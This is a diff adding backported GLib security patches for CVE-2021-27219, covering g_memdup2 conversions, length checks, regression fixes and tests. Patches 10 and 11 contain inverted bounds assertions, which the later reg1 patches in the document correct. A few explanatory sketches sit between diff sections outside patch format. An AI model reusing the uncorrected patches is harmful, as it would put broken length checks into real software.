+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len)
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len)
+ {
+ GSocketAddress *saddr;
+ gint i;
+ guint64 oldest_time = G_MAXUINT64;
+ gint oldest_index = 0;
+
+- if (native_len <= 0)
++ if (native_len == 0)
+ return NULL;
+
+ saddr = NULL;
+@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str
+ {
+ GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr;
+ gpointer tmp_native = socket->priv->recv_addr_cache[i].native;
+- gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
++ gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
+
+ if (!tmp)
+ continue;
+@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str
+ g_free (socket->priv->recv_addr_cache[oldest_index].native);
+ }
+
+- socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len);
++ socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len);
+ socket->priv->recv_addr_cache[oldest_index].native_len = native_len;
+ socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr);
+ socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time ();
+@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G
+ /* do it */
+ while (1)
+ {
++ /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */
++ G_STATIC_ASSERT (sizeof addr <= G_MAXINT);
++
+ addrlen = sizeof addr;
+ if (address)
+ result = WSARecvFrom (socket->priv->fd,
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
new file mode 100644
index 0000000000..63fda0b600
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
@@ -0,0 +1,59 @@
+From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:07:39 +0000
+Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `g_tls_password_set_value_full()` (and the vfunc it
+invokes) can only accept a `gssize` length. Ensure that nul-terminated
+strings passed to `g_tls_password_set_value()` can’t exceed that length.
+Similarly, use `g_memdup2()` to avoid an overflow if they’re longer
+than `G_MAXUINT`.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index 1e437a7b6..dbcec41a8 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -23,6 +23,7 @@
+ #include "glibintl.h"
+
+ #include "gioenumtypes.h"
++#include "gstrfuncsprivate.h"
+ #include "gtlspassword.h"
+
+ #include <string.h>
+@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword *password,
+ g_return_if_fail (G_IS_TLS_PASSWORD (password));
+
+ if (length < 0)
+- length = strlen ((gchar *)value);
++ {
++ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
++ gsize length_unsigned = strlen ((gchar *) value);
++ g_return_if_fail (length_unsigned > G_MAXSSIZE);
++ length = (gssize) length_unsigned;
++ }
+
+- g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free);
++ g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free);
+ }
+
+ /**
+--
+GitLab
+
+
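
On the caller side, the convention this patch tightens looks as follows. This is an illustrative sketch, not part of the patch; note also that the inverted g_return_if_fail() above is corrected later in this commit by CVE-2021-27219-reg1-4.patch.

#include <gio/gio.h>

/* Sketch only: the two ways a caller hands a value to GTlsPassword. */
static void
set_password_examples (GTlsPassword *password)
{
  /* Explicit length: the value need not be nul-terminated. */
  g_tls_password_set_value (password, (const guchar *) "secret", 6);

  /* Length of -1: the value must be nul-terminated; the implementation
   * takes strlen () and, with this patch, refuses lengths that do not
   * fit in a gssize. */
  g_tls_password_set_value (password, (const guchar *) "secret", -1);
}
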
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
new file mode 100644
index 0000000000..a620a49269
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
@@ -0,0 +1,63 @@
+From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:09:40 +0000
+Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that
+nul-terminated strings passed to `g_io_channel_set_line_term()` can’t
+exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()`
+is due to be deprecated), but not to avoid a bug, since it’s also
+limited to `G_MAXUINT`.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c6a89d6e0..4dec20f77 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel *channel,
+ const gchar *line_term,
+ gint length)
+ {
++ guint length_unsigned;
++
+ g_return_if_fail (channel != NULL);
+ g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */
+
+ if (line_term == NULL)
+- length = 0;
+- else if (length < 0)
+- length = strlen (line_term);
++ length_unsigned = 0;
++ else if (length >= 0)
++ length_unsigned = (guint) length;
++ else
++ {
++ /* FIXME: We’re constrained by line_term_len being a guint here */
++ gsize length_size = strlen (line_term);
++ g_return_if_fail (length_size > G_MAXUINT);
++ length_unsigned = (guint) length_size;
++ }
+
+ g_free (channel->line_term);
+- channel->line_term = line_term ? g_memdup (line_term, length) : NULL;
++ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+ channel->line_term_len = length;
+ }
+
+--
+GitLab
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
new file mode 100644
index 0000000000..3047062f54
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
@@ -0,0 +1,36 @@
+From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001
+From: "Jan Alexander Steffens (heftig)" <jan.steffens@gmail.com>
+Date: Sun, 7 Feb 2021 23:32:40 +0100
+Subject: [PATCH 1/5] giochannel: Fix length_size bounds check
+
+The inverted condition is an obvious error introduced by ecdf91400e9a.
+
+Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+
+(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index 4dec20f77..c3f3102ff 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
+ {
+ /* FIXME: We’re constrained by line_term_len being a guint here */
+ gsize length_size = strlen (line_term);
+- g_return_if_fail (length_size > G_MAXUINT);
++ g_return_if_fail (length_size <= G_MAXUINT);
+ length_unsigned = (guint) length_size;
+ }
+
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
new file mode 100644
index 0000000000..2ba26075df
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
@@ -0,0 +1,38 @@
+From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:34:50 +0000
+Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in
+ GIOChannel struct
+
+Adding test coverage indicated that this was another bug in 0cc11f74.
+
+Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings"
+Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c3f3102ff..19bb06ba6 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
+
+ g_free (channel->line_term);
+ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+- channel->line_term_len = length;
++ channel->line_term_len = length_unsigned;
+ }
+
+ /**
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
new file mode 100644
index 0000000000..2c388b4bbb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
@@ -0,0 +1,38 @@
+From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:04:48 +0000
+Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion
+
+The intention here was to assert that the length of the password fits
+in a gssize. Passwords more than half the size of virtual memory are
+probably excessive.
+
+Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords"
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index dbcec41a8..bd86a6dfe 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword *password,
+ {
+ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
+ gsize length_unsigned = strlen ((gchar *) value);
+- g_return_if_fail (length_unsigned > G_MAXSSIZE);
++ g_return_if_fail (length_unsigned <= G_MAXSSIZE);
+ length = (gssize) length_unsigned;
+ }
+
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
new file mode 100644
index 0000000000..356e986fe0
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
@@ -0,0 +1,100 @@
+From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:22:39 +0000
+Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to
+ set the password
+
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit df4501316ca3903072400504a5ea76498db19538)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++
+ 1 file changed, 55 insertions(+)
+
+diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c
+index 4f0737d7e..5661e8e0d 100644
+--- a/gio/tests/tls-interaction.c
++++ b/gio/tests/tls-interaction.c
+@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction *interaction,
+ }
+
+
++/* Return a copy of @str that is allocated in a silly way, to exercise
++ * custom free-functions. The returned pointer points to a copy of @str
++ * in a buffer of the form "BEFORE \0 str \0 AFTER". */
++static guchar *
++special_dup (const char *str)
++{
++ GString *buf = g_string_new ("BEFORE");
++ guchar *ret;
++
++ g_string_append_c (buf, '\0');
++ g_string_append (buf, str);
++ g_string_append_c (buf, '\0');
++ g_string_append (buf, "AFTER");
++ ret = (guchar *) g_string_free (buf, FALSE);
++ return ret + strlen ("BEFORE") + 1;
++}
++
++
++/* Free a copy of @str that was made with special_dup(), after asserting
++ * that it has not been corrupted. */
++static void
++special_free (gpointer p)
++{
++ gchar *s = p;
++ gchar *buf = s - strlen ("BEFORE") - 1;
++
++ g_assert_cmpstr (buf, ==, "BEFORE");
++ g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER");
++ g_free (buf);
++}
++
++
+ static GTlsInteractionResult
+ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ GTlsPassword *password,
+@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ GError **error)
+ {
+ TestInteraction *self;
++ const guchar *value;
++ gsize len;
+
+ g_assert (TEST_IS_INTERACTION (interaction));
+ self = TEST_INTERACTION (interaction);
+@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ g_assert (error != NULL);
+ g_assert (*error == NULL);
+
++ /* Exercise different ways to set the value */
++ g_tls_password_set_value (password, (const guchar *) "foo", 4);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "foo", 4);
++
++ g_tls_password_set_value (password, (const guchar *) "bar", -1);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "bar", 3);
++
++ g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "baa", 4);
++
++ g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "baz", 3);
++
+ /* Don't do this in real life. Include a null terminator for testing */
+ g_tls_password_set_value (password, (const guchar *)"the password", 13);
+ return G_TLS_INTERACTION_HANDLED;
+--
+GitLab
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
new file mode 100644
index 0000000000..dd43689aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
@@ -0,0 +1,49 @@
+From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:16:39 +0000
+Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group
+ is unset
+
+Fix an effective regression in commit
+7781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when
+`convert_path()` is called with a `key` which contains no slashes. In
+that case, the `key` is entirely the `basename`.
+
+Prior to commit 7781a9cb, the code worked through a fluke of `i == -1`
+cancelling out with the various additions in the `g_memdup()` call, and
+effectively resulting in `g_strdup (key)`.
+
+Spotted by Guido Berhoerster.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 25b057672..861c3a661 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ }
+
+ if (basename)
+- *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++ {
++ if (last_slash != NULL)
++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++ else
++ *basename = g_strdup (key);
++ }
+
+ return TRUE;
+ }
+--
+GitLab
+
+
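
Taken together, CVE-2021-27219-08.patch and the fix above give convert_path() the following splitting behaviour. The function below is a standalone illustrative sketch of that logic, not the GLib code itself.

#include <glib.h>
#include <string.h>

/* Sketch only: split a prefix-stripped key into keyfile group and basename
 * using strrchr (), as the patched convert_path () does. */
static void
split_key (const gchar *key, gchar **group, gchar **basename)
{
  const gchar *last_slash = strrchr (key, '/');

  if (last_slash != NULL)
    {
      *group = g_strndup (key, last_slash - key);
      *basename = g_strdup (last_slash + 1);
    }
  else
    {
      /* No slash at all: the key is entirely the basename, the case the
       * patch above fixes (the real code falls back to the root group). */
      *group = NULL;
      *basename = g_strdup (key);
    }
}
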
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
new file mode 100644
index 0000000000..04503641c3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
@@ -0,0 +1,43 @@
+From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:19:30 +0000
+Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group
+ names
+
+These should never have been allowed; they will result in precondition
+failures from the `GKeyFile` later on in the code.
+
+A test will be added for this shortly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 861c3a661..de216e615 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+
+ last_slash = strrchr (key, '/');
+
++ /* Disallow empty group names or key names */
++ if (key_len == 0 ||
++ (last_slash != NULL &&
++ (*(last_slash + 1) == '\0' ||
++ last_slash == key)))
++ return FALSE;
++
+ if (kfsb->root_group)
+ {
+ /* if a root_group was specified, make sure the user hasn't given
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
new file mode 100644
index 0000000000..65f59287a8
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
@@ -0,0 +1,232 @@
+Backport of:
+
+From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:21:36 +0000
+Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile
+ backend
+
+This tests the two recent commits.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 169 insertions(+), 1 deletion(-)
+
+--- a/gio/tests/gsettings.c
++++ b/gio/tests/gsettings.c
+@@ -1,3 +1,4 @@
++#include <errno.h>
+ #include <stdlib.h>
+ #include <locale.h>
+ #include <libintl.h>
+@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con
+ (*b) = TRUE;
+ }
+
++typedef struct
++{
++ const gchar *path;
++ const gchar *root_group;
++ const gchar *keyfile_group;
++ const gchar *root_path;
++} KeyfileTestData;
++
+ /*
+ * Test that using a keyfile works
+ */
+@@ -1834,7 +1843,11 @@ test_keyfile (Fixture *fixture,
+ g_free (str);
+
+ g_settings_set (settings, "farewell", "s", "cheerio");
+-
++
++ /* Check that empty keys/groups are not allowed. */
++ g_assert_false (g_settings_is_writable (settings, ""));
++ g_assert_false (g_settings_is_writable (settings, "/"));
++
+ /* When executing as root, changing the mode of the keyfile will have
+ * no effect on the writability of the settings.
+ */
+@@ -1866,6 +1879,149 @@ test_keyfile (Fixture *fixture,
+ g_free (keyfile_path);
+ }
+
++/*
++ * Test that using a keyfile works with a schema with no path set.
++ */
++static void
++test_keyfile_no_path (Fixture *fixture,
++ gconstpointer user_data)
++{
++ const KeyfileTestData *test_data = user_data;
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ GKeyFile *keyfile;
++ gboolean writable;
++ gchar *key = NULL;
++ GError *error = NULL;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group);
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path);
++ g_object_unref (kf_backend);
++
++ g_settings_reset (settings, "test-boolean");
++ g_assert_true (g_settings_get_boolean (settings, "test-boolean"));
++
++ writable = g_settings_is_writable (settings, "test-boolean");
++ g_assert_true (writable);
++ g_settings_set (settings, "test-boolean", "b", FALSE);
++
++ g_assert_false (g_settings_get_boolean (settings, "test-boolean"));
++
++ g_settings_delay (settings);
++ g_settings_set (settings, "test-boolean", "b", TRUE);
++ g_settings_apply (settings);
++
++ keyfile = g_key_file_new ();
++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++ g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL));
++
++ g_key_file_free (keyfile);
++
++ g_settings_reset (settings, "test-boolean");
++ g_settings_apply (settings);
++ keyfile = g_key_file_new ();
++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++ g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error));
++ g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND);
++ g_clear_error (&error);
++
++ /* Check that empty keys/groups are not allowed. */
++ g_assert_false (g_settings_is_writable (settings, ""));
++ g_assert_false (g_settings_is_writable (settings, "/"));
++
++ /* Keys which ghost the root group name are not allowed. This can only be
++ * tested when the path is `/` as otherwise it acts as a prefix and prevents
++ * any ghosting. */
++ if (g_str_equal (test_data->path, "/"))
++ {
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "/");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++ }
++
++ g_key_file_free (keyfile);
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. */
++ g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0);
++ g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys outside its root path.
++ */
++static void
++test_keyfile_outside_root_path (Fixture *fixture,
++ gconstpointer user_data)
++{
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root");
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/");
++ g_object_unref (kf_backend);
++
++ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++ * don’t error on failure. */
++ g_remove (store_path);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys in the root if no root group is set.
++ */
++static void
++test_keyfile_no_root_group (Fixture *fixture,
++ gconstpointer user_data)
++{
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL);
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/");
++ g_object_unref (kf_backend);
++
++ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++ g_assert_true (g_settings_is_writable (settings, "child/test-boolean"));
++
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++ * don’t error on failure. */
++ g_remove (store_path);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
+ /* Test that getting child schemas works
+ */
+ static void
+@@ -2844,6 +3000,14 @@ main (int argc, char *argv[])
+ gchar *override_text;
+ gchar *enums;
+ gint result;
++ const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" };
++ const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" };
++ const KeyfileTestData keyfile_test_data_long_path = {
++ "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/",
++ "root",
++ "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch",
++ "/"
++ };
+
+ /* Meson build sets this */
+ #ifdef TEST_LOCALE_PATH
+@@ -2967,6 +3131,11 @@ main (int argc, char *argv[])
+ }
+
+ g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown);
++ g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown);
